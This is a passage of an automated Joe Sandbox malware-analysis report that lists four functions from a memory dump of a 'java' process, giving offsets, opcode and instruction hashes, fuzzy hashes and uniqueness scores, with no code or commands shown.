                                                                                                                                                                                                                                    Function 02FDDE6E Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 128887e5085674c3a131763583e0604458e9e84e227ec58394f069fa83850c51
                                                                                                                                                                                                                                    • Instruction ID: 2c8740b24c1dbffa73abfd3842aaea90127b1a71c6265cee672204a377ea6b8e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 128887e5085674c3a131763583e0604458e9e84e227ec58394f069fa83850c51
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F0CAB6D00A06ABDB248F61C0047CAFBB5BB88714F18821AC52C63320CB78B465CFD0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FE3C76 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 61b286bf62ac6f76fcb157fb3f9c8e675d44ba497db915988f5028a90f4359fe
                                                                                                                                                                                                                                    • Instruction ID: 881549ede7c35881c6dcd507d23eccfbd562b70b91011c0fb568c036a8381e72
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61b286bf62ac6f76fcb157fb3f9c8e675d44ba497db915988f5028a90f4359fe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DF0CAB6D00A0AABDB248FA1C0047CAFBB4BB88714F18461AC92C67320D778B465CFC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FDB407 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6d0eedc1ef1ef2bc06989702604a2f9aa5d60069383fa47b703882247f85e1e0
                                                                                                                                                                                                                                    • Instruction ID: 726155b9c3b6e002943bcf036b59b0c3a50db39de8d2845dac17de0ccaf8431d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d0eedc1ef1ef2bc06989702604a2f9aa5d60069383fa47b703882247f85e1e0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BF0CAB6D00A06ABDB248FA1C0047CAFBB8BB88714F19821AC52C63360D778B465CFC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02FE45E9 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2844444063.0000000002FD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_2fd2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b1d09435f4205d379065a0bff1c64a2d1acfdb4e99db6a10f994393e45f0d5c9
                                                                                                                                                                                                                                    • Instruction ID: f10caf6a71b2a0698b50a3b070fd2c59b6eafa2692a081bb34db3174114fe56c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1d09435f4205d379065a0bff1c64a2d1acfdb4e99db6a10f994393e45f0d5c9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0C2B6D00A06ABDB248FA1C0047CAFBB5BB44714F18461AC52C63320D778B465CFC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%